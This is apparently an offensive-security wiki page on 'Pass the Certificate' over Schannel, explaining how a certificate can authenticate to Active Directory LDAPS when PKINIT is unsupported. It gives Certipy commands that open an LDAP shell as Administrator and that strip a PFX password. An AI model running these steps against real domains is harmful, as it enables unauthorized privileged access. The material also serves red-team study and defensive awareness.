search
Infiltr8ForumGitHub
githubEdit

Pass the Certificate - Schannel

hashtag
Theory

In cases where a Domain Controller does not support PKINIT, you may encounter the KDC_ERR_PADATA_TYPE_NOSUPP error when trying to authenticate. For a KDC to support PKINIT, its certificates must include the Smart Card Logon EKU.

Fortunately, we can still use Schannel SSP (Security Service Provider)arrow-up-right to authenticate ourselves using a certificate. Schanel is the SSL/TLS implementation from Microsoft in Windows and can be used to authenticate servers and clients and then use the protocol to encrypt messages between the authenticated parties. Several protocols including LDAP support it.

circle-check

  • Schannel authentication relies on TLS so it is, by design, not subject to channel binding, as the authentication is borne by TLS itself.

  • Schannel is not subject to LDAP signing either as the bind is performed after a StartTLS command when used on the LDAP TCP port.

hashtag
Practice

Authentication via Schannel is supported by Certipyarrow-up-right. lt will open a connection to LDAPS and drop into an interactive shell with limited LDAP commands

certipy auth -pfx <PATH_TO_PFX_CERT> -username <user> -domain <DOMAIN_FQDN> -ldap-shell -ldap-scheme ldaps -dc-ip $DC_IP
[*] Connecting to 'ldaps://10.10.10.10:636'
[*] Authenticated to '10.10.10.10' as: u:CONTOSO.LOCAL\Administrator
Type help for list of commands

# help
circle-info

Notes that Certipy's commands don't support PFXs with password. The following command can be used to "unprotect" a PFX file.

certipy cert -export -pfx <PATH_TO_PFX_CERT> -password <CERT_PASSWORD> -out <unprotected.pfx>

hashtag
Resources

LogoPass the Certificate | The Hacker Recipeswww.thehacker.recipeschevron-right

Last updated